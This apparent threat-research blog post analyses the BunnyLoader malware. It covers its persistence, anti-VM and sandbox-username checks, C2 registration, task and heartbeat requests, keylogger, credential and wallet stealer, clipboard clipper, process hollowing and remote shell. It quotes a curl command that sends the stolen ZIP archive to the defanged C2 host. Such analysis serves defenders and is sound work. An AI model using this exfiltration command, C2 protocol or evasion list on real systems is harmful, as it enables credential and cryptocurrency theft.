Post Content\u00a0\u00a0<\/p>\n

\u200b<\/p>\n

In the following section, we will analyze a malware sample of BunnyLoader. Upon execution of BunnyLoader, the loader performs the following actions:<\/p>\n

Creates a new registry value named “Spyware_Blocker”<\/strong> in the Run registry key (HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun<\/strong>) where the value is the path to the BunnyLoader binary. This registry value allows BunnyLoader to maintain persistence on the machine.
\n\tHides the window using ShowWindow() <\/strong>with nCmdShow<\/strong> as SW_HIDE<\/strong>
\n\tCreates a mutex name “BunnyLoader_MUTEXCONTROL”<\/strong> via CreateMutexW()<\/strong>
\n\tPerforms the following anti-VM techniques:
\n\tChecks for the following modules:
\n\t\tSxIn.dll – 360 Total Security
\n\t\t\tcmdvrt32.dll \/ cmdvrt64.dll – Comodo Antivirus
\n\t\t\twine_get_unix_file_name – Detects Wine
\n\t\t\tSbieDll.dll – Sandboxie<\/p>\n

\t\tChecks for a VM using “ROOTCIMV2” queries:
\n\t\tSELECT * FROM Win32_VideoController
\n\t\t\tWin32_Processor
\n\t\t\tWin32_NetworkAdapter
\n\t\t\tWin32_BIOS
\n\t\t\tSELECT * FROM Win32_ComputerSystem<\/p>\n

\t\tChecks for a Docker container via “\/proc\/1\/cgroup” – if the container exists, BunnyLoader does not perform further malicious actions.
\n\t\tChecks for the following blacklisted sandbox usernames:
\n\t\tANYRUN
\n\t\t\tSandbox
\n\t\t\tTest
\n\t\t\tJohn Doe
\n\t\t\tAbby
\n\t\t\tTimmy
\n\t\t\tMaltest
\n\t\t\tmalware
\n\t\t\tEmily
\n\t\t\tTimmy
\n\t\t\tPaul Jones
\n\t\t\tCurrentUser
\n\t\t\tIT-ADMIN
\n\t\t\tWalker
\n\t\t\tLisa
\n\t\t\tWDAGUtilityAccount
\n\t\t\tVirus
\n\t\t\tfred<\/p>\n

If a sandbox is identified, BunnyLoader throws the following error message: <\/p>\n

“The version of this file is not compatible with the current version of Windows you are running. Check your computer’s system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.”<\/em><\/p>\n

Otherwise, BunnyLoader performs an HTTP registration request to a C2 server as shown below:<\/p>\n

\nGET \/Bunny\/Add.php?country=<country>&ip=<ip>&host=<host>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP\/1.1
\nUser-Agent: BunnyLoader
\nHost: 37[.]139[.]129[.]145
\nCache-Control: no-cache
\nHTTP\/1.1 200 OK
\nDate: Mon, 25 Sep 2023 21:11:41 GMT
\nServer: Apache\/2.4.56 (Win64) OpenSSL\/1.1.1t PHP\/8.2.4
\nX-Powered-By: PHP\/8.2.4
\nContent-Length: 11
\nContent-Type: text\/html; charset=UTF-8
\nConnected<\/p>\n

The registration request sent to the C2 server (shown above) contains the following information:<\/p>\n

Information in C2 server requestValueDescriptioncountryGathers the country where the infected system is connecting from via “http[:]\/\/ip-api.com\/csv” where the user agent is “BunnyRequester”<\/strong>ipGathers the victim IP from”http[:]\/\/api.ipify.org” where the user agent is “BunnyRequester”<\/strong>hostGathers the hostname via GetComputerNameAverThe version of BunnyLoader (e.g., 2.0)system <\/p>\n

Fetches the operating system via “systeminfo findstr \/B \/C:”OS Name”<\/p>\n

\n\t\t\tprivsFetches the privileges of the current user via OpenProcessToken. Sends “Admin” if the user is an administrator or sends the string “user”.avGathers the anti-virus on the infected machine via wmic \/namespace:\\rootSecurityCenter2 path AntiVirusProduct get displayName \/value<\/p>\n

The user agent for the request is set to “BunnyLoader”<\/strong>. If the response from the C2 is “Connected”, BunnyLoader performs the core malicious actions.<\/p>\n

Task Execution<\/strong><\/p>\n

After registration, BunnyLoader sends a task request to the C2 server “http[:]\/\/37[.]139[.]129[.]145\/Bunny\/TaskHandler.php?BotID=<bot_id>” with the user agent as “BunnyTasks”<\/strong>. As shown below, the response to the task request consists of the “ID”, “Name” and “Params”.<\/p>\n

\nGET \/Bunny\/TaskHandler.php?BotID=<Bot_ID> HTTP\/1.1
\nUser-Agent: BunnyTasks
\nHost: 37[.]139[.]129[.]145
\nCache-Control: no-cache
\nHTTP\/1.1 200 OK
\nDate: Mon, 25 Sep 2023 21:11:41 GMT
\nServer: Apache\/2.4.56 (Win64) OpenSSL\/1.1.1t PHP\/8.2.4
\nX-Powered-By: PHP\/8.2.4
\nContent-Length: 102
\nContent-Type: text\/html; charset=UTF-8
\nID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc1<bitcoin_address>5k<\/p>\n

Here the “Name” is the module (functionality) to be executed and the “params” are the parameters passed to the module. Based on the module name received in the task response, BunnyLoader further performs its actions.<\/p>\n

BunnyLoader consists of the following tasks:<\/p>\n

Trojan Downloader
\n\tDownload and Execute (Fileless Execution)
\n\t\tDownload and Execute (Disk Execution)<\/p>\n

\tIntruder
\n\tRun Keylogger
\n\t\tRun Stealer<\/p>\n

\tClipper
\n\tBitcoin
\n\t\tMonero
\n\t\tEthereum
\n\t\tLitecoin
\n\t\tDogecoin
\n\t\tZCash
\n\t\tTether<\/p>\n

\tRemote Command Execution<\/p>\n

Run Keylogger Task<\/strong><\/p>\n

BunnyLoader implements a basic keylogger using GetAsyncKeyState()<\/strong> for logging key strokes. The output of the keylogger is stored in the file “C:Users<username>AppDataLocalKeystrokes.txt<\/strong>“.<\/p>\n

Run Stealer Task<\/strong><\/p>\n

BunnyStealer is designed to steal information related to web browsers, cryptocurrency wallets, VPNs and much more. Eventually the stolen information is stored in a folder named “BunnyLogs” in the AppdataLocal Directory, which is compressed as a ZIP archive, and exfiltrated to the C2 server. The following are the web browsers targeted by BunnyLoader:<\/p>\n

7Star7StarUser Data
\n\tYandexYandexBrowserUser Data
\n\tCentBrowserUser Data
\n\tComodoUser Data
\n\tChedotUser Data
\n\t360BrowserBrowserUser Data
\n\tVivaldiUser Data
\n\tMaxthon3User Data
\n\tKometaUser Data
\n\tK-MelonUser Data
\n\tElements BrowserUser Data
\n\tGoogleChromeUser Data\\SputnikSputnikUser Data
\n\tEpic Privacy BrowserUser Data
\n\tNichromeUser Data
\n\tuCozMediaUranUser Data
\n\tCocCocBrowserUser Data
\n\tFenrir IncSleipnir5settingmodulesChromiumViewer
\n\tUranUser Data
\n\tCatalinaGroupCitrioUser Data
\n\tChromodoUser Data
\n\tCoowonCoowonUser Data
\n\tMail.RuAtomUser Data
\n\tliebaoUser Data
\n\tMicrosoftEdgeUser Data
\n\tQIP SurfUser Data
\n\tBraveSoftwareBrave-BrowserUser Data
\n\tOrbitumUser Data
\n\tChromiumUser Data
\n\tComodoDragonUser Data
\n\tGoogle(x86)ChromeUser Data
\n\tAmigoUserUser Data
\n\tMapleStudioChromePlusUser Data
\n\tTorchUser Data
\n\tIridiumUser Data<\/p>\n

BunnyLoader steals following information from these web browsers:<\/p>\n

AutoFill data
\n\tCredit cards
\n\tDownloads
\n\tHistory
\n\tPasswords<\/p>\n

The malware targets the following cryptocurrency wallets:<\/p>\n

Armory
\n\tExodus
\n\tAutomaticWallet
\n\tBytecoin
\n\tEthereum
\n\tCoinomi
\n\tJaxx
\n\tElectrum
\n\tGuarda<\/p>\n

BunnyLoader steals credentials from the following VPN clients:<\/p>\n

ProtonVPN
\n\tOpenVPN<\/p>\n

Credentials are also stolen from following messaging applications:<\/p>\n

Skype
\n\tTox
\n\tSignal
\n\tElement
\n\tICQ<\/p>\n

Examples of the stolen information are shown in the figure below. The logs consist of an information.txt<\/strong> file which contains system information along with the information related to the location of the infected machine. Each folder contains the corresponding data stolen from the system. For example, the Browser folder contains the web browser history and downloaded file information.<\/p>\n

Figure 5: A screenshot of the information exfiltrated by BunnyLoader.<\/p>\n

The stolen data is archived using the Powershell cmdlet: System.IO.Compression.ZipFile <\/strong>with the filename “BunnyLogs_<hostname>.zip<\/strong>“. The ZIP archive is exfiltrated to the C2 server via the following CURL command:<\/p>\n

\ncmd.exe \/c curl -F
\n“file=@C:UsersuserAppDataLocalBunnyLogs_468325.zip”
\nhttp[:]\/\/37[.]139[.]129[.]145\/Bunny\/Uploader.php<\/p>\n

BunnyLoader also performs a stealer registration request containing statistics related to the stolen information and the link to the exfiltrated logs with the user agent: “BunnyStealer”,<\/strong> as shown below:<\/p>\n

\nGET \/Bunny\/StealerRegistration.php?country=<country>&ip=<ip>&system=Micro
\nsoft+Windows+10+Pro%0A&chromium=18&crypto=1&messages=0&vpn=0&keys=0&lin
\nk=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_
\n468325.zip&date=Mon+Sep+25+21%3A47%3A41+2023%0A&games=0 HTTP\/1.1
\nUser-Agent: BunnyStealer
\nHost: 37[.]139[.]129[.]145
\nCache-Control: no-cache<\/p>\n

Clipper Task<\/strong><\/p>\n

The BunnyLoader clipper module checks a victim’s clipboard for content matching cryptocurrency addresses and replaces them with a wallet address controlled by the threat actor.<\/p>\n

In this case, the targeted cryptocurrencies are: <\/p>\n

Bitcoin
\n\tMonero
\n\tEthereum
\n\tLitecoin
\n\tDogecoin
\n\tZCash
\n\tTether<\/p>\n

The clipper receives the cryptocurrency wallet addresses to replace from the C2 server.<\/p>\n

Download and Execute Task<\/strong><\/p>\n

BunnyLoader performs two types of download and execute functions. <\/p>\n

The first type is downloading a file from a URL provided by the C2, which is written to disk in the AppDataLocal directory and further executed.
\n\tThe second type uses fileless execution, where BunnyLoader creates a “notepad.exe” process in a suspended state and then downloads the payload from the received URL with the user agent “BunnyLoader_Dropper”. <\/strong>The downloaded binary is stored in a memory buffer and BunnyLoader performs Process Hollowing<\/strong> to inject the downloaded payload into the “notepad.exe” process as shown in the figure below.<\/p>\n

Figure 6: A screenshot of BunnyLoader fileless download and executing code.<\/p>\n

After the tasks are completed, BunnyLoader sends the following task completion request with the user agent as “TaskCompleted” and the CommandID as the Task ID. An example task completion request is shown below:<\/p>\n

\nhttp:\/\/37[.]139[.]129[.]145\/Bunny\/TaskHandler.php?CommandID=5&BotID=272148461<\/p>\n

Remote Command Execution Task<\/strong><\/p>\n

BunnyLoader performs remote command execution from the C2 panel. BunnyLoader receives the commands to be executed on the infected machine via an “echoer” request to C2 server (e.g., http[:]\/\/37[.]139[.]129[.]145\/Bunny\/Echoer.php<\/strong>) with the user agent set to “BunnyTasks”<\/strong> as shown in the figure below.BunnyLoader parses the response and checks for the following commands: “help”, “cd”, “pwd” and then executes the command using _popen<\/strong> and the command output is been sent across to the C2 server as the “&value=<\/strong>” parameter in a result command request: (e.g., http[:]\/\/37[.]139[.]129[.]145\/Bunny\/ResultCMD.php<\/strong>) with the user agent: “BunnyShell”<\/strong>.<\/p>\n

Figure 7: A screenshot of BunnyLoader remote command execution.<\/p>\n

BunnyLoader also performs a heartbeat request in order to inform the C2 that the infected system is online as shown below. The user agent for the heartbeat is “HeartBeat_Sender”.<\/strong><\/p>\n

\nGET \/Bunny\/Heartbeat.php?country=<country>&ip=<ip>&host=<hostname>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP\/1.1
\nUser-Agent: HeartBeat_Sender
\nHost: 37[.]139[.]129[.]145
\nCache-Control: no-cache
\nHTTP\/1.1 200 OK
\nDate: Mon, 25 Sep 2023 21:11:41 GMT
\nServer: Apache\/2.4.56 (Win64) OpenSSL\/1.1.1t PHP\/8.2.4
\nX-Powered-By: PHP\/8.2.4
\nContent-Length: 13
\nContent-Type: text\/html; charset=UTF-8
\nClient online
\n\u00a0\u00a0<\/p>","protected":false},"excerpt":{"rendered":"

Post Content\u00a0\u00a0 \u200b In the following section, we will analyze […]<\/p>\n","protected":false},"author":0,"featured_media":1283,"comment_status":"","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-1282","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-zenith-zscaler"],"yoast_head":"\n